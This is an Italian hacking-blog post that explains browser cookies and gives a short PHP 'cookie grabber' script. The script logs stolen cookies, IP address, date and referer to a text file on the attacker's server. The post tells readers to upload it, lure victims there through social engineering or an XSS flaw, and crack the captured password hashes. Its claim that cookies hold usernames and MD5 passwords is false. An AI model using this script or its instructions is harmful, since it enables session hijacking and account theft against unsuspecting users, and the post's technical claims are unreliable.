DISCLAIMER!

Le informazioni (e i download, quindi tutti i file contenuti nel blog) da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio e/o illecito delle tecniche e dei programmi qui descritti e di tutti i danni a cose e persone e/o perdite di guadagni che ne possano derivare. Il blog non vuole istigare nessuno a delinquere o a commettere reati. Le tecniche qui descritte sono da utilizzare a proprio rischio e pericolo.

Traduci Il Blog In




Cerca in Xthreme Hacking!

Cookie Grabber



Intanto cos’è un cookie:
Altro non è che un file di testo contenente determinati dati e viene inviato dal server web in contemporanea alla pagina internet e successivamente salvato in una cartella del vostro browser.
Servono per far si che il borwser possa identificarli in modo da associarli al server che li ha generati. Di conseguenza possiamo dire che ogni server prosuce il suo cookie per permetterne poi il riconoscimento quando ci si ricollega.
Inoltre un cookie memorizza cnhe tutti i dati inseriti nei form, come username e password per accedere ad aree riservate di siti. avviene più precisamente che dopo aver inserito i dati di accesso ad esempio e dato l’ok, il server ci genera il cookie contenente tali dati in modo da esser riconosciuti dal server anche al prossimo accesso…si intuisce che qualora settassimo il nostro browser in modo da rifiutare i cookie, non ci si potrebbe autenticare su nessun sito.
Qundi vien generato un cookie ogni volta che visitate qualunque sito e vengon salvate tutte le impostazioni e operazioni che fate.
Capite allora la grossa importanza di un cookie e il “potere” che esso ha!
E a questo punto sorge la domanda: e se qualcuno si impossessasse dei miei cookie? meglio ancora dei cookie con dati di accesso…?
E qui ecco che subentra appunto il cookie grabber!!!

Cookie grabber:
Catturando dei cookie con un cookie grabber, si può risalire quindi a tante informazioni personali delle vittime alle quali li abbiamo sottratti.
Bastano poche righe di codice in php per creare un cookie grabber e implementarlo e utilizzarlo in diversi modi…un esempio e con una XSS.
Scriviamo queste poche righe di codice su un qualsiasi editor di testo, salviamo il file nel formato .php e lo uppiamo sul nostro spazio web. A questo punto basta indirizzare in qualche modo la vittima alla pagina web alla quale è collegato il cookie grabber (con un po’ di social engineering) e saranno catturati i suoi cookie con tutti i dati…anche username e password…che saranno salvati su un file .txt che si trova sempre nel nostro spazio web (nell’esempio saranno salvati nel file “file.txt”).
Le password non saranno esplicite però, ma in “hash md5″ (cioè criptate con questa chiave)…ma basta un semplice programma o uno dei tanti siti web che offrono la conversione da questa forma criptata in forma chiara e leggibile, ed è fatta.

Esempio di un cookie grabber:

CODICE:
$cookie = $_GET['c'];
$ip = getenv (’REMOTE_ADDR’);
$date=date(”j F, Y, g:i a”);
$referer=getenv (’HTTP_REFERER’);
$fp = fopen(’file.txt’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Referer: ‘.$referer.’

’);
fclose($fp);
?>
Pubblicato da BSOD

Nessun commento:

Posta un commento

Iscriviti a: Commenti sul post (Atom)